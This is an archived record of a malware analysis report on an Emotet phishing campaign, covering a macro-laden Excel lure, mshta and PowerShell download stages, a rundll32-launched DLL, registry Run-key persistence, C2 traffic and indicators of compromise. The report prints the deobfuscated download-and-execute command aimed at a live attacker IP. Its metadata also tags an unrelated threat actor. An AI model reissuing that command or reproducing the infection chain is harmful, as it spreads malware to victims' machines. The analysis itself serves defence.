{
	"id": "49a4ed69-5a81-4d3c-b3f0-64d5b34e30cd",
	"created_at": "2026-04-06T00:07:40.506467Z",
	"updated_at": "2026-04-10T03:21:28.855608Z",
	"deleted_at": null,
	"sha1_hash": "6283bc11b7a3c59f8a6fc32595fb15c8e9d56132",
	"title": "Technical Malware Analysis: The return of Emotet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3329465,
	"plain_text": "Technical Malware Analysis: The return of Emotet\r\nBy Anonymous\r\nPublished: 2022-02-13 · Archived: 2026-04-05 21:07:48 UTC\r\nThis post was authored by Taqi, Rosamira and Fareed.\r\nOverview\r\nNetbyteSEC malware analyst team has come across a Microsoft Excel document containing a malicious macro\r\ncode. The suspicious email was received by our client. The malicious attachment seems to be an Emotet malware\r\nthat is often used in phishing campaigns.\r\nEmotet is a Trojan that primarily spreads through malicious spam attachments pretending to be invoices, shipping\r\ndocuments, delivery notification, etc. The attachment may arrive either via malicious script, macro-enabled\r\ndocument files, or malicious link, which will download the Emotet excutable upon execution. The Emotet emails\r\nmay contain familiar branding designed to look like a legitimate email. Emotet may try to persuade users to click\r\nthe malicious file.\r\nThe scenario of the analysis is as follows:\r\nFigure 1: Flow of Emotet Attack\r\nEmail analysis\r\nSpearphishing Attachment\r\nUpon opening the victim’s suspicious email attachment. The attachment is encrypted with the given password\r\n\"1843\". Since the attachment was encrypted, the Google mail server cannot scan for viruses. It was normal for an\r\norganization to encrypt their attachment however, the receiver should be aware of potential malicious content\r\nwhen received via email. \r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 1 of 14\n\nFigure 2 : Email details\r\nInvestigating the email, Netbytesec malware analyst noticed that the attackers used DNS name spoofing to\r\nimpersonate their display name as a legitimate user. Also, attached to the email is an attachment of a zip file\r\ncontaining payload of the attackers.\r\nMalicious document analysis\r\nFurther analysis will focus on the malicious document (XLS) used as the lure inside the password protected zip\r\nfile.\r\nMD5 Hash: 25995b47257212e2e3ca5f7704c9e830\r\nFilename: untitled_176399.xls\r\nFile Type:  Excel Binary File Format (.xls)\r\nUpon opening the malicious document, the attacker used a common tactic deployed by cybercriminals to trick\r\nvictims to click the “Enable Content” ribbon button display in Microsoft Excel as shown in Figure 3 below.\r\nUnsuspected victim will enable the content macro thus leading to the malicious script being executed in the\r\nbackground stealthily without the victim’s knowledge.\r\nFigure 3 : Opening the malicious document\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 2 of 14\n\nEnabling the content will execute the macro embedded in the lure document which will lead to malicious macro\r\nexecution.\r\nInvestigating the Excel file, Netbytesec malware analyst found that there is a malicious Excel 4.0 macro stored\r\ninside the Excel file.\r\nFigure 4 : Results from OleVBA3 against the malicious attachment\r\nAs shown in the figure 4 above, the malicious code will try to execute an obfuscated code of  mshta\r\nhttp://91.240.118.168/oo/aa/se.html via CMD. \r\nNext, Netbytesec malware analysts perform VirusTotal lookup to check for any further clues on the IP address\r\nfound in the VBA macro. It seems that 16 security vendors in VirusTotal flagged the IP address as malicious as\r\nshown in following figure.\r\nFigure 5 : 16 security vendors flagged this IP address as malicious.\r\nFuthermore, the community in VirusTotal also mentioned that the IP address is a collection of IP addresses used\r\nfor the Emotet malware campaign. This convinces Netbytesec malware analyst that the IP address found in the\r\nExcel 4.0 macro is one of the Indicator of Compromise for the Emotet campaign.\r\nOnce the malicious document (maldoc) opens and enables the macro, the maldoc runs the macro code and\r\ndownloads the se.html which contains malicious javascript payload. The deobfuscated Macro VBA code from the\r\nmalicious excel document would look like this: \r\nCMD.EXE /c mshta http://91.240.118.168/oo/aa/se.html\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 3 of 14\n\nThis malicious code uses mshta.exe which will fetch and execute HTA code in the se.html. The usage of mshta.exe\r\nis a common technique used by malicious attackers to execute Microsoft HTML Application (HTA) files. Mshta\r\nmay execute Windows Script Host code (VBScript and JScript) contained within HTML, as its full name suggests.\r\nIn this scenario, the code se.html was a javascript and visual basic scripting payload.\r\nBased on the PCAP analaysis, below figure shows the HTTP request and response to the server (91.240.118.61) to\r\nfetch se.html. We will explain in the next section about what se.html does in this malicious attachment. \r\nFigure 6 : The captured network traffic that is generated by the malicious document.\r\nUpon opening the malicious HTML file (se.html), the HTML page appears to be protected by HTML Guardian per\r\nsaid by the banner in the display.\r\nFigure 7 : Opening the se.html through the web browser\r\nTrying to read through the browser's view source file also prevents us from getting more information regarding\r\nwhat the HTML content. Scrolling down the html file, Netbytesec malware analyst discovered some HTML code\r\nstarting at line 65.\r\nFigure 8 : The content of the html file can be seen started at line 65\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 4 of 14\n\nNetbytesec malware analyst started to investigate and analyzed the malicious payload se.html and found  the code\r\nwas obfuscated javascript code.\r\nThe figure below shows the obfuscated javascript code that Netbytesec malware analyst gained from se.html.\r\n Figure 9 : Obfuscated Javascript se.html\r\nInspecting the code can see that the most of the script is used for the display page and only portion of the code for\r\nthe malicious payload.\r\nFigure 10 : HTML Structure of se.html\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 5 of 14\n\nFigure 11 :  VB script contained in an html file.\r\nBased on figure 11 above, the syntax “Window.ReSizeTo 0,0” refers to nullifying the size of the script in the\r\nwebpage. On other hand, ‘visibility:hidden’ hides the appearance of the script while disabling click-ability on the\r\nelement.\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 6 of 14\n\nFigure 12 : Deobfuscated VB script which leads to an obfuscated Powershell command.\r\nNext, Netbytesec malware analyst start to investigate the script in the HTML file that does the execution of the\r\nobfuscated Powershell commands and able to retrieve the obfuscated Powershell payload.\r\nCommand and Scripting Interpreter: Powershell \r\nThe code mentioned in figure 12 are as follow:\r\nFigure 13 : Deobfuscated Powershell code.\r\nFrom the decoded Powershell, Netbytesec malware analysts looked up the link URL\r\nhttp://91.240.118.168/oo/aa/se.png and found another malicious Powershell script. The se.png file  contains\r\nPowershell code as shown in figure below.\r\nFigure 14 : Powershell code from se.png that will downloads malicious DLL from available website\r\nBased on the figure 14 above, the Powershell script basically will download an executable from the URLs and\r\nexecute it using Rundll32.exe.\r\nMalicious DLL analysis\r\nSigned Binary Proxy Execution: Rundll32 \r\nAccording to the previous Powershell command, the malicious script  downloads the malicious DLL file and saves\r\nit at C:\\ProgramData folder with name QWER.DLL. Next, the Powershell command will call cmd.exe to execute\r\nRunDLL.exe with QWER.DLL as its DLL path and \"AADD\" as its arbitrary export.\r\nFigure 15: Powershell execution to run malicious DLL files with arbitrary arguments\r\nAs shown in the red box in figure below, at the end of the script, the script will execute the command to begin the\r\nDLL binary execution.\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 7 of 14\n\nFigure 16: DLL execution\r\n\"AADD\" is the export argument used for executing QWER.DLL. However, the arguments can be anything and\r\narbitrary as long as it is not empty or null in order to run it as intended. After that, a second Powershell execution\r\nwill be triggered.\r\nFigure 17: Rundll32.exe executable running the malicious file with specific arguments, ‘DllRegisterServer’\r\nThe second execution will only run after the first execution of the malicious DLL which contains arbitrary\r\narguments as a trigger point. The secondary execution contains the real entry point of the malicious DLL which\r\nuses cmd.exe to call Rundll32.exe with the export arguments of ‘DllRegisterServer’.\r\nThis behavior can be found in the disassembled code where the malware first will decrypt or unpack their code in\r\nthe heap and then call the address of the unpacked code at the address 10046FA3 as shown in the figure below. \r\nFigure 18: The sample call the unpacked code\r\nIn the unpack/decrypted code, there are two main functions that the subroutine will do. The first one is to spawn\r\nthe Rundll32 command and the second part of the subroutine is to exit the process. When the spawn of the\r\nRundll32 function is being called, it will literally run the command with the export name “DllRegisterServer”\r\nwhich will invoke the “DllRegisterServer” export function at the second stage.\r\nIn the figure 19 below, the sample build up and import CreateProcessW Windows API from kernel32.dll and runs\r\nthe function which lead to the command execution of Rundll32 application.\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 8 of 14\n\nFigure 19: QWER.DLL sample import CreateProccessW Windows API\r\nDrilling down the inner code of the export DllRegisterServer will gave us a clue what does the function does. The\r\nfirst subroutine in the function will do the unpacking process of the code into an allocated memory and return the\r\naddress in EAX register. The address then will be invoke at line 0x10045da0 as shown in following figure.\r\n Figure 20: DllRegisterServer code\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 9 of 14\n\nIn this unpacked section, the malware makes the connection to three different C2 IP addresses which will be\r\nexplained in section TA001 Command and Control in the next section ahead.\r\nRegistry Run Keys / Startup Folder\r\nAfter the malware attempts to register at startup of the windows as persistence mechanism, it will move and\r\nrename QWER.DLL to a new path with a new arbitrary name of DLL and new arbitrary arguments. It will register\r\non HKEY-USERS that contains user-specific configuration information for all currently active users on the\r\ncomputer. \r\nFigure 21: Malware attempt to register at startup of the windows as persistence mechanism, with alongside new\r\nbinary with new arguments at new path \r\nThe persistence of the malware is set up to be running when the victim starts up their machine through Windows\r\nRegistry’s register at HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nFigure 22: Again, arbitrary arguments is used to trigger and run the new malicious DLL\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 10 of 14\n\nFigure 23 : New malware with persistence at boot start-up executing DllRegisterServer\r\nAt this point, the malware is well set up and hidden in a new path and persistence. It will run every time the\r\ncurrent user is booting up their  machine.\r\nCommand and Control\r\nDuring investigation, the communication with the C2 server was captured by Sysmon log activity via port 8080. \r\nFigure 24 : Malware communicating with C2 Server of 159.69.43.124:8080\r\nThe TCP connection is initiated to 159.69.43.124 through 8080 port of the server right after the DLL was\r\nexecuted. According to the Sysmon log, the domain name resolved to this IP is clients.your-server.de.\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 11 of 14\n\nFigure 25 : Virustotal intelligence confirmed that the IP is used for Emotet Command \u0026 Control server\r\nThe malware uses Windows API InternetConnectW to create the connection to the C2 server. As you can see in\r\nthe following figure, the malware creates the first connection to the IP address 159.69.43.124 via 8080 port, the\r\nsame as detected in the Sysmon log.\r\nFigure 26 : Malware connection to first  C2 server, 159.69.43.124\r\nObserving the behavior in the debugger resulting us to discover the second C2 connection. The communication\r\nwas made to the different IP address which is 45.79.80.198 on port 443.\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 12 of 14\n\nFigure 27 : Malware making second connection to another C2 server, 45.79.80.198\r\nInitiating the request of the connection will create the connection as Netbytesec malware analyst observe the\r\nnetwork behaviour and step over the HttpSendRequest function.\r\nFigure 28 : Malware using HttpSendRequest function\r\nConclusion\r\nThe attacker sends email to the targeted victims by spoofing their display name to a legitimate name. However, the\r\nemail displays still stays the same, which is the original email of the Emotet campaign agent. For this specific\r\ncase, the attacker sent an email to one of the target using hijacked email thread. In the email is attached an excel\r\nfile titled ‘untitled_176399.xls ’. The content of their email contains a malicious script that will execute mshta\r\nbinary in order to download and execute the next malicious payload from 91.240.118.168.\r\nThe executed malicious payload will download a PNG file from the same IP containing Powershell payload that\r\nwill download malicious DLL from one of the domains, save it at C:/ProgramData with name QWER.DLL. Afet\r\nthat, it will execute Rundll32.exe to run QWER.DLL with an arbitrary argument. The execution of QWER.DLL\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 13 of 14\n\nwith arbitrary argument served as the trigger for the next execution of QWER.DLL with specific argument of\r\nDllRegisterServer which is the real entrypoint of the DLL.\r\nThe malicious DLL will duplicate itself to a new arbitrary path in C:/\u003cUsers\u003e/AppData/Local/ with new arbitrary\r\nname and arbitrary arguments and register itself in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run in\r\nWindows registry. As a result, the malicious DLL will be persistent and will be executed every time the user boots\r\nup their machine. The persistence malware will communicate with the C2 server at 159.69.43.124 through the port\r\n8080.\r\nIndicator of Compromises\r\nIP address\r\n91.240.118[.]168\r\n159.69.43[.]124:8080 (C2 Servers)\r\n45.79.80[.]198 (C2 Servers)\r\nDomains\r\nhttp://91.240.118[.]168/oo/aa/se.html\r\n http://91.240.118[.]168/oo/aa/se.png\r\nhttp://farmmash[.]com/edh2fa/g2Q7Qbgs/\r\nhttp://karensgardentips[.]com/cgi-bin/hfpv/\r\nhttp://centrobilinguelospinos[.]com/wp-admin/w8528qkQnMPLDUc/\r\nhttp://unitedhorus[.]com/wp-content/m3oxVSV2uYW2rbh/\r\nhttp://vldispatch[.]com/licenses/JE6Ol2dfhrk/\r\nhttp://il-piccolo-principe[.]com/wp-content/Ua9GvD7acXnDz/\r\nhttp://hardstonecap[.]com/well-known/ps9kNMgc6/\r\nhttp://3-fasen[.]com/wp-content/3Bl0hBbW/\r\nhttp://baldcover[.]com/wp-admin/oRwkRUWpbJ55/\r\nHash\r\n25995b47257212e2e3ca5f7704c9e830 (untitled_176399.xls)\r\n9bf1102cd38dc1364f54407bb4cb2a (se.html)\r\n63f0672552a000605e99190036e9676f (se.png)\r\n74bb69b8ba9d2b649f4de5adb2cf06d9 (QWER.DLL)\r\nFull report can be seen here\r\nSource: https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nhttps://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html"
	],
	"report_names": [
		"technical-malware-analysis-return-of.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434060,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6283bc11b7a3c59f8a6fc32595fb15c8e9d56132.pdf",
		"text": "https://archive.orkl.eu/6283bc11b7a3c59f8a6fc32595fb15c8e9d56132.txt",
		"img": "https://archive.orkl.eu/6283bc11b7a3c59f8a6fc32595fb15c8e9d56132.jpg"
	}
}